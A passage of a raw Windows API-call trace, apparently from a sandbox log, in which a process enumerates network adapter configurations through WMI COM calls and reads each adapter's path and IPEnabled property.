Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f29c | out: ppvObject=0x19f29c*=0x5945f0) returned 0x0 [0178.817] WbemDefPath:IUnknown:AddRef (This=0x5945f0) returned 0x3 [0178.817] WbemDefPath:IUnknown:Release (This=0x5945f0) returned 0x2 [0178.817] WbemDefPath:IWbemPath:SetText (This=0x5945f0, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=1") returned 0x0 [0178.817] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594200, puCount=0x19f420 | out: puCount=0x19f420*=0x2) returned 0x0 [0178.817] WbemDefPath:IWbemPath:GetText (in: This=0x594200, lFlags=4, puBuffLength=0x19f41c*=0x0, pszText=0x0 | out: puBuffLength=0x19f41c*=0xf, pszText=0x0) returned 0x0 [0178.817] WbemDefPath:IWbemPath:GetText (in: This=0x594200, lFlags=4, puBuffLength=0x19f41c*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f41c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0178.817] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594200, puCount=0x19f3ec | out: puCount=0x19f3ec*=0x2) returned 0x0 [0178.817] WbemDefPath:IWbemPath:GetText (in: This=0x594200, lFlags=4, puBuffLength=0x19f3e8*=0x0, pszText=0x0 | out: puBuffLength=0x19f3e8*=0xf, pszText=0x0) returned 0x0 [0178.817] WbemDefPath:IWbemPath:GetText (in: This=0x594200, lFlags=4, puBuffLength=0x19f3e8*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f3e8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0178.817] IWbemClassObject:Get (in: This=0x5766d8, wszName="IPEnabled", lFlags=0, pVal=0x19f3e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x22fc8d0*=0, plFlavor=0x22fc8d4*=0 | out: pVal=0x19f3e8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x22fc8d0*=11, plFlavor=0x22fc8d4*=0) returned 0x0 [0178.818] IWbemClassObject:Get (in: This=0x5766d8, wszName="IPEnabled", lFlags=0, pVal=0x19f3f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x22fc8d0*=11, plFlavor=0x22fc8d4*=0 | out: pVal=0x19f3f0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x22fc8d0*=11, plFlavor=0x22fc8d4*=0) returned 0x0 [0178.818] IUnknown:Release (This=0x5766d8) returned 0x2 [0178.818] CoTaskMemAlloc (cb=0x4) returned 0x596e88 [0178.818] IEnumWbemClassObject:Next (in: This=0x59a690, lTimeout=-1, uCount=0x1, apObjects=0x596e88, puReturned=0x22fb57c | out: apObjects=0x596e88*=0x576ad8, puReturned=0x22fb57c*=0x1) returned 0x0 [0178.819] IUnknown:QueryInterface (in: This=0x576ad8, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea50 | out: ppvObject=0x19ea50*=0x576ad8) returned 0x0 [0178.819] IUnknown:QueryInterface (in: This=0x576ad8, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ea0c | out: ppvObject=0x19ea0c*=0x0) returned 0x80004002 [0178.819] IUnknown:QueryInterface (in: This=0x576ad8, riid=0x69519bb4*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e82c | out: ppvObject=0x19e82c*=0x0) returned 0x80004002 [0178.819] IUnknown:QueryInterface (in: This=0x576ad8, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e604 | out: ppvObject=0x19e604*=0x0) returned 0x80004002 [0178.819] IUnknown:AddRef (This=0x576ad8) returned 0x3 [0178.819] IUnknown:QueryInterface (in: This=0x576ad8, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e364 | out: ppvObject=0x19e364*=0x0) returned 0x80004002 [0178.819] IUnknown:QueryInterface (in: This=0x576ad8, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e314 | out: ppvObject=0x19e314*=0x0) returned 0x80004002 [0178.819] IUnknown:QueryInterface (in: This=0x576ad8, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e320 | out: ppvObject=0x19e320*=0x576adc) returned 0x0 [0178.820] IMarshal:GetUnmarshalClass (in: This=0x576adc, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e328 | out: pCid=0x19e328*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0178.820] IUnknown:Release (This=0x576adc) returned 0x3 [0178.820] CoGetContextToken (in: pToken=0x19e380 | out: pToken=0x19e380) returned 0x0 [0178.820] CoGetContextToken (in: pToken=0x19e788 | out: pToken=0x19e788) returned 0x0 [0178.820] IUnknown:QueryInterface (in: This=0x576ad8, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e814 | out: ppvObject=0x19e814*=0x0) returned 0x80004002 [0178.820] IUnknown:Release (This=0x576ad8) returned 0x2 [0178.820] CoGetContextToken (in: pToken=0x19ed60 | out: pToken=0x19ed60) returned 0x0 [0178.820] CoGetContextToken (in: pToken=0x19ecc0 | out: pToken=0x19ecc0) returned 0x0 [0178.820] IUnknown:QueryInterface (in: This=0x576ad8, riid=0x19ed90*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19ed8c | out: ppvObject=0x19ed8c*=0x576ad8) returned 0x0 [0178.820] IUnknown:AddRef (This=0x576ad8) returned 0x4 [0178.820] IUnknown:Release (This=0x576ad8) returned 0x3 [0178.820] IUnknown:Release (This=0x576ad8) returned 0x2 [0178.820] CoTaskMemFree (pv=0x596e88) [0178.820] CoGetContextToken (in: pToken=0x19f0d0 | out: pToken=0x19f0d0) returned 0x0 [0178.820] IUnknown:AddRef (This=0x576ad8) returned 0x3 [0178.820] IWbemClassObject:Get (in: This=0x576ad8, wszName="__GENUS", lFlags=0, pVal=0x19f3e4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f464*=0, plFlavor=0x19f460*=0 | out: pVal=0x19f3e4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f464*=3, plFlavor=0x19f460*=64) returned 0x0 [0178.820] IWbemClassObject:Get (in: This=0x576ad8, wszName="__PATH", lFlags=0, pVal=0x19f3c8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f44c*=0, plFlavor=0x19f448*=0 | out: pVal=0x19f3c8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=2", varVal2=0x0), pType=0x19f44c*=8, plFlavor=0x19f448*=64) returned 0x0 [0178.820] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=2") returned 0x7a [0178.820] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=2") returned 0x7a [0178.821] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x464 [0178.821] SetEvent (hEvent=0x3b4) returned 1 [0178.821] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x19f3a0*=0x464, lpdwindex=0x19f1bc | out: lpdwindex=0x19f1bc) returned 0x0 [0178.825] CoGetContextToken (in: pToken=0x19f270 | out: pToken=0x19f270) returned 0x0 [0178.825] CoGetContextToken (in: pToken=0x19f1d0 | out: pToken=0x19f1d0) returned 0x0 [0178.825] WbemDefPath:IUnknown:QueryInterface (in: This=0x5946d0, riid=0x19f2a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f29c | out: ppvObject=0x19f29c*=0x5946d0) returned 0x0 [0178.825] WbemDefPath:IUnknown:AddRef (This=0x5946d0) returned 0x3 [0178.825] WbemDefPath:IUnknown:Release (This=0x5946d0) returned 0x2 [0178.825] WbemDefPath:IWbemPath:SetText (This=0x5946d0, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=2") returned 0x0 [0178.825] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594200, puCount=0x19f420 | out: puCount=0x19f420*=0x2) returned 0x0 [0178.825] WbemDefPath:IWbemPath:GetText (in: This=0x594200, lFlags=4, puBuffLength=0x19f41c*=0x0, pszText=0x0 | out: puBuffLength=0x19f41c*=0xf, pszText=0x0) returned 0x0 [0178.826] WbemDefPath:IWbemPath:GetText (in: This=0x594200, lFlags=4, puBuffLength=0x19f41c*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f41c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0178.826] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594200, puCount=0x19f3ec | out: puCount=0x19f3ec*=0x2) returned 0x0 [0178.826] WbemDefPath:IWbemPath:GetText (in: This=0x594200, lFlags=4, puBuffLength=0x19f3e8*=0x0, pszText=0x0 | out: puBuffLength=0x19f3e8*=0xf, pszText=0x0) returned 0x0 [0178.826] WbemDefPath:IWbemPath:GetText (in: This=0x594200, lFlags=4, puBuffLength=0x19f3e8*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f3e8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0178.826] IWbemClassObject:Get (in: This=0x576ad8, wszName="IPEnabled", lFlags=0, pVal=0x19f3e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x22fd144*=0, plFlavor=0x22fd148*=0 | out: pVal=0x19f3e8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x22fd144*=11, plFlavor=0x22fd148*=0) returned 0x0 [0178.826] IWbemClassObject:Get (in: This=0x576ad8, wszName="IPEnabled", lFlags=0, pVal=0x19f3f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x22fd144*=11, plFlavor=0x22fd148*=0 | out: pVal=0x19f3f0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x22fd144*=11, plFlavor=0x22fd148*=0) returned 0x0 [0178.826] IUnknown:Release (This=0x576ad8) returned 0x2 [0178.826] CoTaskMemAlloc (cb=0x4) returned 0x596f78 [0178.826] IEnumWbemClassObject:Next (in: This=0x59a690, lTimeout=-1, uCount=0x1, apObjects=0x596f78, puReturned=0x22fb57c | out: apObjects=0x596f78*=0x5b1b68, puReturned=0x22fb57c*=0x1) returned 0x0 [0178.827] IUnknown:QueryInterface (in: This=0x5b1b68, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea50 | out: ppvObject=0x19ea50*=0x5b1b68) returned 0x0 [0178.827] IUnknown:QueryInterface (in: This=0x5b1b68, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ea0c | out: ppvObject=0x19ea0c*=0x0) returned 0x80004002 [0178.827] IUnknown:QueryInterface (in: This=0x5b1b68, riid=0x69519bb4*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e82c | out: ppvObject=0x19e82c*=0x0) returned 0x80004002 [0178.827] IUnknown:QueryInterface (in: This=0x5b1b68, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e604 | out: ppvObject=0x19e604*=0x0) returned 0x80004002 [0178.828] IUnknown:AddRef (This=0x5b1b68) returned 0x3 [0178.828] IUnknown:QueryInterface (in: This=0x5b1b68, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e364 | out: ppvObject=0x19e364*=0x0) returned 0x80004002 [0178.828] IUnknown:QueryInterface (in: This=0x5b1b68, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e314 | out: ppvObject=0x19e314*=0x0) returned 0x80004002 [0178.828] IUnknown:QueryInterface (in: This=0x5b1b68, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e320 | out: ppvObject=0x19e320*=0x5b1b6c) returned 0x0 [0178.828] IMarshal:GetUnmarshalClass (in: This=0x5b1b6c, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e328 | out: pCid=0x19e328*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0178.828] IUnknown:Release (This=0x5b1b6c) returned 0x3 [0178.828] CoGetContextToken (in: pToken=0x19e380 | out: pToken=0x19e380) returned 0x0 [0178.828] CoGetContextToken (in: pToken=0x19e788 | out: pToken=0x19e788) returned 0x0 [0178.828] IUnknown:QueryInterface (in: This=0x5b1b68, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e814 | out: ppvObject=0x19e814*=0x0) returned 0x80004002 [0178.828] IUnknown:Release (This=0x5b1b68) returned 0x2 [0178.828] CoGetContextToken (in: pToken=0x19ed60 | out: pToken=0x19ed60) returned 0x0 [0178.828] CoGetContextToken (in: pToken=0x19ecc0 | out: pToken=0x19ecc0) returned 0x0 [0178.828] IUnknown:QueryInterface (in: This=0x5b1b68, riid=0x19ed90*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19ed8c | out: ppvObject=0x19ed8c*=0x5b1b68) returned 0x0 [0178.828] IUnknown:AddRef (This=0x5b1b68) returned 0x4 [0178.828] IUnknown:Release (This=0x5b1b68) returned 0x3 [0178.828] IUnknown:Release (This=0x5b1b68) returned 0x2 [0178.829] CoTaskMemFree (pv=0x596f78) [0178.829] CoGetContextToken (in: pToken=0x19f0d0 | out: pToken=0x19f0d0) returned 0x0 [0178.829] IUnknown:AddRef (This=0x5b1b68) returned 0x3 [0178.829] IWbemClassObject:Get (in: This=0x5b1b68, wszName="__GENUS", lFlags=0, pVal=0x19f3e4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f464*=0, plFlavor=0x19f460*=0 | out: pVal=0x19f3e4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f464*=3, plFlavor=0x19f460*=64) returned 0x0 [0178.829] IWbemClassObject:Get (in: This=0x5b1b68, wszName="__PATH", lFlags=0, pVal=0x19f3c8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f44c*=0, plFlavor=0x19f448*=0 | out: pVal=0x19f3c8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=3", varVal2=0x0), pType=0x19f44c*=8, plFlavor=0x19f448*=64) returned 0x0 [0178.829] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=3") returned 0x7a [0178.829] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=3") returned 0x7a [0178.829] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x468 [0178.829] SetEvent (hEvent=0x3b4) returned 1 [0178.829] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x19f3a0*=0x468, lpdwindex=0x19f1bc | out: lpdwindex=0x19f1bc) returned 0x0 [0178.832] CoGetContextToken (in: pToken=0x19f270 | out: pToken=0x19f270) returned 0x0 [0178.832] CoGetContextToken (in: pToken=0x19f1d0 | out: pToken=0x19f1d0) returned 0x0 [0178.832] WbemDefPath:IUnknown:QueryInterface (in: This=0x594740, riid=0x19f2a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f29c | out: ppvObject=0x19f29c*=0x594740) returned 0x0 [0178.832] WbemDefPath:IUnknown:AddRef (This=0x594740) returned 0x3 [0178.832] WbemDefPath:IUnknown:Release (This=0x594740) returned 0x2 [0178.832] WbemDefPath:IWbemPath:SetText (This=0x594740, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=3") returned 0x0 [0178.832] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594200, puCount=0x19f420 | out: puCount=0x19f420*=0x2) returned 0x0 [0178.832] WbemDefPath:IWbemPath:GetText (in: This=0x594200, lFlags=4, puBuffLength=0x19f41c*=0x0, pszText=0x0 | out: puBuffLength=0x19f41c*=0xf, pszText=0x0) returned 0x0 [0178.832] WbemDefPath:IWbemPath:GetText (in: This=0x594200, lFlags=4, puBuffLength=0x19f41c*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f41c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0178.832] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594200, puCount=0x19f3ec | out: puCount=0x19f3ec*=0x2) returned 0x0 [0178.832] WbemDefPath:IWbemPath:GetText (in: This=0x594200, lFlags=4, puBuffLength=0x19f3e8*=0x0, pszText=0x0 | out: puBuffLength=0x19f3e8*=0xf, pszText=0x0) returned 0x0 [0178.832] WbemDefPath:IWbemPath:GetText (in: This=0x594200, lFlags=4, puBuffLength=0x19f3e8*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f3e8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0178.832] IWbemClassObject:Get (in: This=0x5b1b68, wszName="IPEnabled", lFlags=0, pVal=0x19f3e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x22fd9b8*=0, plFlavor=0x22fd9bc*=0 | out: pVal=0x19f3e8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x22fd9b8*=11, plFlavor=0x22fd9bc*=0) returned 0x0 [0178.832] IWbemClassObject:Get (in: This=0x5b1b68, wszName="IPEnabled", lFlags=0, pVal=0x19f3f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x22fd9b8*=11, plFlavor=0x22fd9bc*=0 | out: pVal=0x19f3f0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x22fd9b8*=11, plFlavor=0x22fd9bc*=0) returned 0x0 [0178.832] IUnknown:Release (This=0x5b1b68) returned 0x2 [0178.832] CoTaskMemAlloc (cb=0x4) returned 0x596e38 [0178.832] IEnumWbemClassObject:Next (in: This=0x59a690, lTimeout=-1, uCount=0x1, apObjects=0x596e38, puReturned=0x22fb57c | out: apObjects=0x596e38*=0x576410, puReturned=0x22fb57c*=0x1) returned 0x0 [0178.834] IUnknown:QueryInterface (in: This=0x576410, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea50 | out: ppvObject=0x19ea50*=0x576410) returned 0x0 [0178.834] IUnknown:QueryInterface (in: This=0x576410, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ea0c | out: ppvObject=0x19ea0c*=0x0) returned 0x80004002 [0178.834] IUnknown:QueryInterface (in: This=0x576410, riid=0x69519bb4*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e82c | out: ppvObject=0x19e82c*=0x0) returned 0x80004002 [0178.834] IUnknown:QueryInterface (in: This=0x576410, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e604 | out: ppvObject=0x19e604*=0x0) returned 0x80004002 [0178.834] IUnknown:AddRef (This=0x576410) returned 0x3 [0178.834] IUnknown:QueryInterface (in: This=0x576410, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e364 | out: ppvObject=0x19e364*=0x0) returned 0x80004002 [0178.834] IUnknown:QueryInterface (in: This=0x576410, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e314 | out: ppvObject=0x19e314*=0x0) returned 0x80004002 [0178.834] IUnknown:QueryInterface (in: This=0x576410, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e320 | out: ppvObject=0x19e320*=0x576414) returned 0x0 [0178.834] IMarshal:GetUnmarshalClass (in: This=0x576414, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e328 | out: pCid=0x19e328*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0178.834] IUnknown:Release (This=0x576414) returned 0x3 [0178.834] CoGetContextToken (in: pToken=0x19e380 | out: pToken=0x19e380) returned 0x0 [0178.834] CoGetContextToken (in: pToken=0x19e788 | out: pToken=0x19e788) returned 0x0 [0178.834] IUnknown:QueryInterface (in: This=0x576410, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e814 | out: ppvObject=0x19e814*=0x0) returned 0x80004002 [0178.834] IUnknown:Release (This=0x576410) returned 0x2 [0178.835] CoGetContextToken (in: pToken=0x19ed60 | out: pToken=0x19ed60) returned 0x0 [0178.835] CoGetContextToken (in: pToken=0x19ecc0 | out: pToken=0x19ecc0) returned 0x0 [0178.835] IUnknown:QueryInterface (in: This=0x576410, riid=0x19ed90*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19ed8c | out: ppvObject=0x19ed8c*=0x576410) returned 0x0 [0178.835] IUnknown:AddRef (This=0x576410) returned 0x4 [0178.835] IUnknown:Release (This=0x576410) returned 0x3 [0178.835] IUnknown:Release (This=0x576410) returned 0x2 [0178.835] CoTaskMemFree (pv=0x596e38) [0178.835] CoGetContextToken (in: pToken=0x19f0d0 | out: pToken=0x19f0d0) returned 0x0 [0178.835] IUnknown:AddRef (This=0x576410) returned 0x3 [0178.835] IWbemClassObject:Get (in: This=0x576410, wszName="__GENUS", lFlags=0, pVal=0x19f3e4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f464*=0, plFlavor=0x19f460*=0 | out: pVal=0x19f3e4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f464*=3, plFlavor=0x19f460*=64) returned 0x0 [0178.835] IWbemClassObject:Get (in: This=0x576410, wszName="__PATH", lFlags=0, pVal=0x19f3c8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f44c*=0, plFlavor=0x19f448*=0 | out: pVal=0x19f3c8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=4", varVal2=0x0), pType=0x19f44c*=8, plFlavor=0x19f448*=64) returned 0x0 [0178.835] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=4") returned 0x7a [0178.835] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=4") returned 0x7a [0178.835] CreateEventW (lpEventAttributes=0x0, bManualReset=0, 